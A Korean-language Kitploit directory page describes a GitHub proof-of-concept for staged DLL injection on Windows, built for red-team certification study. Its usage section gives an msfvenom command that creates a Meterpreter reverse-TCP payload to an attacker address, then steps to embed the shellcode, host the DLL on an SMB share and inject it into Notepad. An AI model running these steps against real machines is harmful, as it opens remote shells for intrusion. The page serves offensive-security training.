Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
staged-DLL-Injection-SMB- — Win32 API를 사용하여 C로 작성된 단계적 DLL 인젝션 개념 증명 — 레드팀 인증 연구(CRTO)를 위해 격리된 실험실 환경에서 개발됨. | Kitploit
도구/GitHubGitHub/kasturixbm5/staged-dll-injection-smb-
ExploitationShellcodePenetration TestingLearning & EducationRed TeamingShellcode GenerationPayload DevelopmentLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
GitHub
kasturixbm5/staged-dll-injection-smb-

staged-DLL-Injection-SMB-

Win32 API를 사용하여 C로 작성된 단계적 DLL 인젝션 개념 증명 — 레드팀 인증 연구(CRTO)를 위해 격리된 실험실 환경에서 개발됨.

저장소 보기
428503개월 전Kitploit 검토 완료
공유

staged-DLL-Injection

Win32 API를 사용하여 C로 작성된 단계적 DLL 인젝션 개념 증명 — 레드팀 인증 연구(CRTO)를 위해 격리된 연구실 환경에서 개발됨.

⚠️ 면책 조항: 이 프로젝트는 공격 보안 연구 및 인증 연구(CRTO)의 일환으로 교육 목적으로 엄격히 격리된 연구실 환경에서 개발되었습니다. 명시적인 서면 승인 없이 어떤 시스템에도 사용하도록 의도되지 않았습니다. 무단 사용은 불법이며 비윤리적입니다.

개요

Windows에서 단계적 DLL 인젝션의 개념 증명 구현으로, 레드팀 인증 연구의 일부로 구축되었습니다. 이 프로젝트는 스테이저가 기본 Win32 API를 사용하여 원격으로 대상 프로세스에 악성 DLL을 로드하는 방법을 보여줍니다. 내부 네트워크에서 SMB 트래픽을 허용하는 AD 환경에서 가장 잘 작동하며, 인터넷을 통한 사용은 권장되지 않습니다.

사용법

root@kitploit:~
1. Build a shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o /directory/payload.bin
2. Obtain the raw shellcode and convert into a C array
xxd -i payload.bin > payload.h
3. Copy the shellcode, and paste it under unsigned char payload_bin[] {xxxxx} array in maindll.c
4. Modify the phc.c to point the address to your IP in dllPath[]
5. Compile phc.c into .exe, and compile maindll.c into .dll file
6. Host the smb server, and paste the maindll.dll
7. Set up Listener
8. Open Notepad.exe and find the PID
9. Run phc.exe <PID>

작동 방식

스테이저 (phc.c)

  • 명령줄 인수로 대상 프로세스 PID를 받습니다.
  • OpenProcess를 통해 대상 프로세스에 대한 핸들을 엽니다.
  • VirtualAlloc을 통해 대상 프로세스 내에 메모리를 할당합니다.
  • Kernel32에서 LoadLibraryW의 주소를 검색합니다.
  • CreateRemoteThread를 통해 원격 스레드를 생성하여 LoadLibraryW를 호출하고, 원격 SMB 공유에서 DLL을 로드합니다.

DLL (maindll.dll)

  • 임베디드 셸코드 페이로드를 포함합니다.
  • DllMain은 DLL_PROCESS_ATTACH 시 자동으로 실행됩니다.
  • VirtualAlloc을 통해 실행 가능한 메모리를 할당합니다.
  • 셸코드를 메모리에 복사하고 CreateThread를 통해 실행합니다.

공격 흐름

phc.exe → 대상 프로세스 열기 → 대상 프로세스에 메모리 할당 → LoadLibraryW를 통해 SMB 공유에서 maindll.dll 로드 → DllMain 실행 → 대상 프로세스 내에서 셸코드 실행

시연된 기술

  • CreateRemoteThread + LoadLibraryW를 통한 원격 DLL 인젝션
  • C에서 셸코드 임베딩 및 실행
  • DllMain을 통한 DLL 엔트리 포인트 악용
  • SMB를 통한 원격 페이로드 스테이징

제작 도구

  • C
  • Win32 API
  • msfvenom
  • Sliver C2

환경

격리된 연구실 환경의 Windows 10에서 테스트되었습니다. C2 리스너는 Kali Linux에서 호스팅되었습니다.

도구 다운로드